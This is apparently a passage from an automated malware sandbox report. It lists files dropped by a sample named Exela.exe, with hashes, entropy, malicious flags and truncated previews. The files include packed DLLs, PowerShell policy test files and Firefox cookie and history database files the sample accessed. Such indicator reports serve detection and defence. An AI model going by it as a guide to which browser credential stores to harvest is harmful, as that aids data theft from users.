                                                                                                  SHA-256:312E9B01D1632840983E8533D1685A64FB87E4538F724A7A59A71B1BA148BBAC
                                                                                                  SHA-512:3EB7599825B7B21AAAB05E420DD16D4A8EAA21652D232F6E4EDE213A232B701401556E44DF73CFA20AE855D1ADC28304B52D42367B74EBD8E96C2E3D9A9B93E2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].t.<r'.<r'.<r'.D.'.<r'.@s&.<r'.@w&.<r'.@v&.<r'.@q&.<r'i@s&.<r'.<s'.<r'.Ns&.<r'i@.&.<r'i@r&.<r'i@.'.<r'i@p&.<r'Rich.<r'........PE..d...&..c.........." ...".0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\sqlite3.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):623480
                                                                                                  Entropy (8bit):7.993502110233887
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:12288:MZNIrMyJHzTarSwdWd5Xhm/27cz5hQYuHDiL1IcUq4P8ryHn5+8ybL:UNPsHzTaWwdS5xV70QYMDiCc34e8nI82
                                                                                                  MD5:6A3A34C9C67EFD6C17D44292E8DB8FAD
                                                                                                  SHA1:339B1E514D60D8370EAEC1E2F2B71CEAD999F970
                                                                                                  SHA-256:7B0E840165D65F0F5285476467E4C154C4D936613966B84948110A4614B9CAD9
                                                                                                  SHA-512:6F2A1B670D28762745F0D3B961A331CBBB0DEC244F8798734B911B3A3BC9519C73A3B26F1E1117725F6F1E880E57CADB562A1450659BCA1AAE353F6B9575D7F5
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......CG;..&U..&U..&U..^..&U.HZT..&U.HZP..&U.HZQ..&U.HZV..&U..TT..&U..&T..&U..Z]..&U..ZU..&U..Z...&U..ZW..&U.Rich.&U.................PE..d...X..c.........." ...".0...0............................................................`.............................................d"..................................x...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc....0...........,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\unicodedata.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):294784
                                                                                                  Entropy (8bit):7.987175768019268
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:HudZUEjoXwDrGv4qJBd4R0u3FIp6O4LMHS+OsfW/+vzoFZ:8GEjyirGd+f3FIp7eMHS+CUUr
                                                                                                  MD5:FED35DB31377D515D198E5E446498BE2
                                                                                                  SHA1:62E388D17E17208EA0E881CCD96C75B7B1FBC5F7
                                                                                                  SHA-256:AF3CDC9A2A1D923BE67244429867A3C5C70835249E3573A03B98D08D148FE24B
                                                                                                  SHA-512:0985528CB0289086EC895E21A8947E04F732D5660460F2E7FA8668BD441C891438781C808BCEA9294F348720E3752C10EA65363371F7E75EA48600D016BAB72A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t..t..t..}...r..;...v..;...y..;...|..;...w.....w......v..t..%.....u.....u...y.u.....u..Richt..........PE..d...(..c.........." ...".P..........@V... ................................................`..........................................{..X....y.......p..........<............{......................................@b..@...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\yarl\_quoting_c.cp310-win_amd64.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):41984
                                                                                                  Entropy (8bit):7.855273475576537
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:l9cI+dPPKdf1F9wj1SWBbDVnK3O047BshaLNL10cOWkuVb70FKKEIpmQ:EPKdUDh0M8mn9kupRKEVQ
                                                                                                  MD5:8640834733897205D9193E1B21084135
                                                                                                  SHA1:E452AE2DBABCC8691233428DD1DA5D23961B047D
                                                                                                  SHA-256:BD209AB04BA8A3A40546832380547A460B1257F4FB4B4012F6FC48F9C36CC476
                                                                                                  SHA-512:365805A31ED3EF7648FA2FAC49FECC0646DD5DFCAD8468918623D962DB6AAB08339F510EDCCDAF1340F8BFC06A4628C070DE947CDEC55CFABDC3563AF2DE43E7
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:G.]~&..~&..~&..w^+.z&..o...|&......|&..o...}&..o...v&..o...r&...S..}&..~&...&.......&.......&....G..&.......&..Rich~&..................PE..d....Lg.........." ...*.........`.......p................................... ............`.............................................d...............................................................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_255uf4ic.vjy.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ioj1lru.u3q.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fcnfi2v.a4a.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4s4d55pc.4ut.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4sc0uhpi.lew.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4seilnl3.ucs.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ifjvzva.bqk.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5x2e0q0d.luc.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvwa2cvg.dep.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fonfkeut.vub.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1wzzila.z0q.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idwjsyiz.r4z.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5zgexqv.ury.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvkdil5d.h0a.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxi5iijp.g1q.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vyaloivp.2tr.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x44lpwl4.usd.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zreqoge0.fxn.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\grrdkexq

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):2.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:qn:qn
                                                                                                  MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                  SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                  SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                  SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                  Malicious:false
                                                                                                  Preview:blat

                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                  Malicious:false
                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                  Malicious:false
                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................

                                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_0em2nmw2.db3.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
